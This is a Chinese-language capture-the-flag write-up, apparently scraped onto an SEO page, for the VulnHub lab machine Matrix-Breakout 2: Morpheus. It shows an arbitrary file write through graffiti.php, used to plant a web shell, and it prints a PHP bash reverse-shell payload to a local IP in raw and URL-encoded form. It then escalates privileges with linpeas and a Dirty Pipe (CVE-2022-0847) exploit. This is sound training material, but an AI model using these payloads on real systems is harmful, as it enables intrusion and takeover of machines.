当前位置: 首页 > wzjs >正文

韩国的电商网站chatgpt网址

韩国的电商网站,chatgpt网址,网站怎么做备份,网站开发定制合同范本靶机下载地址: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova 1、信息收集 主机发现 arp-scan-l 看看端口详细信息 nmap -A -T4 -p- 192.168.13.145 访问80端口,发现是个带着图片的界面,没有什么可以传参的…

靶机下载地址:
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
1、信息收集
主机发现 arp-scan-l
在这里插入图片描述
看看端口详细信息 nmap -A -T4 -p- 192.168.13.145
在这里插入图片描述
访问80端口,发现是个带着图片的界面,没有什么可以传参的地方
在这里插入图片描述
2、漏洞发现
查找该网站下的txt,zip,php,html文件
ffuf -u http://192.168.13.145/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
在这里插入图片描述
于是就看到这几个文件:
robots.txt
graffiti.txt
graffiti.php
在这里插入图片描述
发现在graffiti.php的输入框输入内容后会保存到graffiti.txt文件中,先抓个包看看变量名
在这里插入图片描述
此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件
在这里插入图片描述
接下来,准备反弹shell
在这里插入图片描述
访问试试,白屏就是写入成功
在这里插入图片描述
接下来使用蚁剑连接
在这里插入图片描述
cd到根目录发现了一个FLAG.txt
在这里插入图片描述
cat一下查看内容,结尾出现了一个名叫cypher-neo.png的图片。好像让我去获取一个密码。那就去看看这个png
在这里插入图片描述
因为蚁剑的文件不是完整的,可能会有隐藏文件,做个反弹shell双管齐下(一句话需要魔改一下,弄上URL编码,干掉问号和空格和&)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.13.129/666 0>&1'"); ?>

<%3fphp+exec(“/bin/bash±c+‘bash±i+>%26+/dev/tcp/192.168.13.129/4444+0>%261’”);+%3f>
在这里插入图片描述
访问192.168.13.145/b.php,反弹成功!

在这里插入图片描述
3、提权
查看刚才提示里的图片,在网站上看不有啥,下载下来看看
在这里插入图片描述
wget http://192.168.13.145/.cypher-neo.png
binwalk .cypher-neo.png
binwalk 下面是它的常用参数
-E:用于解码和提取已知的文件类型。
-M:在提取过程中自动尝试解密已知的加密算法。
-e:用于提取文件。
-y:用于自动确定文件系统类型。
-f:用于指定要分析的文件格式。
-l:用于显示已知的签名。
-x:用于提取文件系统。
-d:启用调试模式。
-v:显示详细输出。
-R:递归分析。
在这里插入图片描述
加–run-as=root,之后目录下会多个目录
binwalk -e .cypher-neo.png --run-as=root
在这里插入图片描述
zlib提取不太会,等改天有时间再慢慢看吧
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
从github上找的一个提权脚本
https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/32ca1c6c-01e4-46f3-8ffe-c29d28b8d6a8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240814%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240814T102734Z&X-Amz-Expires=300&X-Amz-Signature=da267aa55d6b221464632e1fcd22046dd324f2ce1cd1953dcb40a66c6a322da0&X-Amz-SignedHeaders=host&actor_id=108580799&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
回到蚁剑,把文件传上来
在这里插入图片描述
cd /var/www/html
chmod +x linpeas.sh
在这里插入图片描述
脚本和内核版本全指向了一个CVE-2022-0847的漏洞
在这里插入图片描述
接下来就找个exploit,下载好了,就通过蚁剑传上去
https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh
给权限,再运行
chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
在这里插入图片描述
提权成功,查看flag
cat /root/FLAG.txt
在这里插入图片描述

http://www.dtcms.com/wzjs/265447.html

相关文章:

  • wordpress android开源seo搜索引擎优化5
  • 郑州网站建设专业公司关于网站推广
  • 自助建站教程市场调研方法有哪些
  • 成都网站建设g冠辰搜索引擎营销广告
  • 天津市建设委员会 网站百度seo关键词优化工具
  • 网站建设基本知识qq排名优化网站
  • 国家市场监督管理总局74号令青岛 google seo
  • 做网站需要会哪些计算机语言自建网站平台
  • 做养生网站怎么赚钱百度热搜关键词排名优化
  • 域名分析网站网络科技公司经营范围
  • 网站基础优化地推app推广赚佣金
  • 开一家网站建设公司怎样上海网络推广服务公司
  • 发改委门户网站建设思路内容营销的4个主要方式
  • 福州企业网站建设专业服务黑帽seo技术论坛
  • 深圳信用网seo优化一般包括
  • 如何制作手机网站太原网站建设制作
  • 专门做行业分析的网站百度网址名称是什么
  • 长治企业网站建设百度电脑版下载官网
  • 宁波装修公司网站关键字优化
  • 中文企业网站设计欣赏潍坊网站收录
  • 域名cn是个什么网站好项目推荐平台
  • mvc 网站建设做搜索引擎优化的企业
  • 做视频网站赚做视频网站赚网络营销的现状分析
  • 建筑企业网站有哪些广告优化师工作内容
  • 如何做搞笑的视频视频网站抖音黑科技引流推广神器
  • 怎么把网站做的靠前职业培训机构排名前十
  • 网站是否必须做认证推广软件是什么工作
  • 做英语quiz的网站网站免费搭建平台
  • 学校二级网站建设武汉百度推广公司
  • 个人备案做别的网站广告平台推广渠道